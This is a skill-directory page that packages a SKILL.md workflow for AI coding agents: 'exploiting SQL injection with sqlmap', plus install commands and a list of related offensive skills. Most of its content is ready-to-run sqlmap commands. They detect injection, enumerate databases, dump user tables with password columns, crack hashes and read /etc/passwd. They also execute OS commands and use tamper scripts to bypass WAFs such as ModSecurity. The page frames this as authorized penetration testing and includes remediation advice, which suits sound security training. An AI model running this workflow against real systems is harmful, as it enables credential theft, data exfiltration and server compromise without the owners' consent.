exploiting-sql-injection-with-sqlmap

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.

16 stars

byplurigrid

View on GitHub Installation ↓

Best use case

exploiting-sql-injection-with-sqlmap is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.

Teams using exploiting-sql-injection-with-sqlmap should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

You only need a quick one-off answer and do not need a reusable workflow.
You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploiting-sql-injection-with-sqlmap/SKILL.md --create-dirs "https://raw.githubusercontent.com/plurigrid/asi/main/plugins/asi/skills/exploiting-sql-injection-with-sqlmap/SKILL.md"

Manual Installation

Download SKILL.md from GitHub
Place it in .claude/skills/exploiting-sql-injection-with-sqlmap/SKILL.md inside your project
Restart your AI agent — it will auto-discover the skill

How exploiting-sql-injection-with-sqlmap Compares

Feature / Agent	exploiting-sql-injection-with-sqlmap	Standard Approach
Platform Support	Not specified	Limited / Varies
Context Awareness	High	Baseline
Installation Complexity	Unknown	N/A

Frequently Asked Questions

What does this skill do?

Detecting and exploiting SQL injection vulnerabilities using sqlmap to extract database contents during authorized penetration tests.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Exploiting SQL Injection with sqlmap

## When to Use

- During authorized web application penetration testing engagements
- When manual testing reveals potential SQL injection points in parameters, headers, or cookies
- For validating SQL injection findings from automated scanners like Burp Suite or OWASP ZAP
- When you need to demonstrate the impact of SQL injection by extracting data from backend databases
- During CTF challenges involving SQL injection exploitation

## Prerequisites

- **Authorization**: Written penetration testing agreement (Rules of Engagement) for the target
- **sqlmap**: Install via `pip install sqlmap` or `apt install sqlmap` on Kali Linux
- **Python 3.6+**: Required runtime for sqlmap
- **Burp Suite** (optional): For capturing and replaying HTTP requests
- **Target access**: Network connectivity to the target web application
- **Browser with proxy**: Firefox with FoxyProxy for intercepting requests

## Workflow

### Step 1: Identify Potential Injection Points

Manually browse the application and identify parameters that interact with the database. Use Burp Suite to capture requests.

```bash
# Start Burp Suite proxy and capture requests
# Look for parameters in URLs, POST bodies, cookies, and headers
# Example target URL with a suspected injectable parameter:
# https://target.example.com/products?id=1

# Test manually for basic SQL injection indicators
curl -k "https://target.example.com/products?id=1'"
# Look for SQL error messages like:
# - "You have an error in your SQL syntax"
# - "ORA-01756: quoted string not properly terminated"
# - "Microsoft SQL Native Client error"
```

### Step 2: Run sqlmap Basic Detection Scan

Launch sqlmap against the suspected injection point to confirm the vulnerability and identify the database type.

```bash
# Basic GET parameter test
sqlmap -u "https://target.example.com/products?id=1" --batch --random-agent

# For POST requests (save the request from Burp Suite to a file)
sqlmap -r request.txt --batch --random-agent

# Test specific parameter in a POST request
sqlmap -u "https://target.example.com/login" \
  --data="username=admin&password=test" \
  -p "username" --batch --random-agent

# Test with cookie-based injection
sqlmap -u "https://target.example.com/dashboard" \
  --cookie="session=abc123; user_id=5" \
  -p "user_id" --batch --random-agent
```

### Step 3: Enumerate Database Structure

Once injection is confirmed, enumerate databases, tables, and columns.

```bash
# List all databases
sqlmap -u "https://target.example.com/products?id=1" --dbs --batch --random-agent

# List tables in a specific database
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db --tables --batch --random-agent

# List columns in a specific table
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db -T users --columns --batch --random-agent
```

### Step 4: Extract Data from Target Tables

Dump the contents of sensitive tables to demonstrate impact.

```bash
# Dump specific columns from a table
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db -T users -C "username,password,email" \
  --dump --batch --random-agent

# Dump with row limit to avoid excessive data extraction
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db -T users --dump --start=1 --stop=10 \
  --batch --random-agent

# Attempt to crack password hashes automatically
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db -T users -C "username,password" \
  --dump --batch --passwords --random-agent
```

### Step 5: Test for Advanced Exploitation Vectors

Assess the full impact by testing OS-level access and file operations.

```bash
# Check current database user and privileges
sqlmap -u "https://target.example.com/products?id=1" \
  --current-user --current-db --is-dba --batch --random-agent

# Attempt to read server files (if DBA privileges exist)
sqlmap -u "https://target.example.com/products?id=1" \
  --file-read="/etc/passwd" --batch --random-agent

# Attempt OS command execution (MySQL with FILE privilege)
sqlmap -u "https://target.example.com/products?id=1" \
  --os-cmd="whoami" --batch --random-agent
```

### Step 6: Use Tamper Scripts to Bypass WAF/Filters

When Web Application Firewalls or input filters block basic payloads, use tamper scripts.

```bash
# Common tamper scripts for WAF bypass
sqlmap -u "https://target.example.com/products?id=1" \
  --tamper="space2comment,between,randomcase" \
  --batch --random-agent

# For specific WAF bypass (e.g., ModSecurity)
sqlmap -u "https://target.example.com/products?id=1" \
  --tamper="modsecurityversioned,modsecurityzeroversioned" \
  --batch --random-agent

# List all available tamper scripts
sqlmap --list-tampers
```

### Step 7: Generate Report and Clean Up

Document findings and clean up any artifacts.

```bash
# sqlmap stores results in ~/.local/share/sqlmap/output/
# Review the target output directory
ls -la ~/.local/share/sqlmap/output/target.example.com/

# Export results with specific output directory
sqlmap -u "https://target.example.com/products?id=1" \
  -D target_db -T users --dump \
  --output-dir="/tmp/pentest-results" \
  --batch --random-agent

# Clean sqlmap session data after engagement
sqlmap --purge
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Union-based SQLi** | Uses UNION SELECT to append attacker query results to the original query output |
| **Blind Boolean SQLi** | Infers data one bit at a time by observing true/false application responses |
| **Blind Time-based SQLi** | Uses database sleep functions (e.g., `SLEEP(5)`) to infer data based on response delays |
| **Error-based SQLi** | Extracts data through verbose database error messages returned in HTTP responses |
| **Stacked Queries** | Executes multiple SQL statements separated by semicolons for INSERT/UPDATE/DELETE operations |
| **Out-of-band SQLi** | Exfiltrates data via DNS or HTTP requests initiated by the database server |
| **Tamper Scripts** | sqlmap plugins that modify payloads to bypass WAFs and input sanitization filters |
| **Second-order SQLi** | Injected payload is stored and executed later in a different query context |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **sqlmap** | Automated SQL injection detection and exploitation framework |
| **Burp Suite Professional** | HTTP proxy for intercepting, modifying, and replaying requests |
| **OWASP ZAP** | Free alternative to Burp for web application scanning and proxying |
| **Havij** | Automated SQL injection tool with GUI (Windows) |
| **jSQL Injection** | Java-based GUI tool for SQL injection testing |
| **DBeaver/DataGrip** | Database clients for verifying extracted data structure |

## Common Scenarios

### Scenario 1: E-commerce Product Page SQLi
A product detail page uses `id` parameter directly in SQL query. Use sqlmap to extract the full customer database including payment information to demonstrate critical business impact.

### Scenario 2: Login Form Bypass
A login form concatenates user input into an authentication query. Exploit to bypass authentication and enumerate all user credentials stored in the database.

### Scenario 3: Search Function with WAF Protection
A search feature is vulnerable to SQL injection but protected by a WAF. Use tamper scripts like `space2comment` and `between` to encode payloads and bypass the filter rules.

### Scenario 4: Cookie-based Blind SQL Injection
A session cookie value is used in a database query on the server side. Use time-based blind injection techniques to extract data character by character.

## Output Format

```
## SQL Injection Finding

**Vulnerability**: SQL Injection (Union-based)
**Severity**: Critical (CVSS 9.8)
**Location**: GET parameter `id` at /products?id=1
**Database**: MySQL 8.0.32
**Impact**: Full database read access, 15,000 user records exposed
**OWASP Category**: A03:2021 - Injection

### Evidence
- Injection point: `id` parameter (GET)
- Technique: UNION query-based
- Backend DBMS: MySQL >= 5.0
- Current user: app_user@localhost
- DBA privileges: No

### Databases Enumerated
1. information_schema
2. target_app_db
3. mysql

### Sensitive Data Exposed
- Table: users (15,247 rows)
- Columns: id, username, email, password_hash, created_at

### Recommendation
1. Use parameterized queries (prepared statements) for all database interactions
2. Implement input validation with allowlists for expected data types
3. Apply least-privilege database permissions for the application user
4. Deploy a Web Application Firewall as defense-in-depth
5. Enable database query logging and monitoring for anomalous patterns
```

Related Skills

testing-for-xxe-injection-vulnerabilities

from plurigrid/asi

Discovering and exploiting XML External Entity injection vulnerabilities to read server files, perform SSRF, and exfiltrate data during authorized penetration tests.

testing-for-xml-injection-vulnerabilities

from plurigrid/asi

Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks.

testing-for-host-header-injection

from plurigrid/asi

Test web applications for HTTP Host header injection vulnerabilities to identify password reset poisoning, web cache poisoning, SSRF, and virtual host routing manipulation risks.

testing-for-email-header-injection

from plurigrid/asi

Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.

performing-second-order-sql-injection

from plurigrid/asi

Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.

performing-packet-injection-attack

from plurigrid/asi

Crafts and injects custom network packets using Scapy, hping3, and Nemesis during authorized security assessments to test firewall rules, IDS detection, protocol handling, and network stack resilience against malformed and spoofed traffic.

hunting-for-process-injection-techniques

from plurigrid/asi

Detect process injection techniques (T1055) including CreateRemoteThread, process hollowing, and DLL injection via Sysmon Event IDs 8 and 10 and EDR process telemetry

exploiting-zerologon-vulnerability-cve-2020-1472

from plurigrid/asi

Exploit the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol to achieve domain controller compromise by resetting the machine account password to empty.

exploiting-websocket-vulnerabilities

from plurigrid/asi

Testing WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized security assessments.

exploiting-vulnerabilities-with-metasploit-framework

from plurigrid/asi

The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules

exploiting-type-juggling-vulnerabilities

from plurigrid/asi

Exploit PHP type juggling vulnerabilities caused by loose comparison operators to bypass authentication, circumvent hash verification, and manipulate application logic through type coercion attacks.

exploiting-template-injection-vulnerabilities

from plurigrid/asi

Detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities across Jinja2, Twig, Freemarker, and other template engines to achieve remote code execution.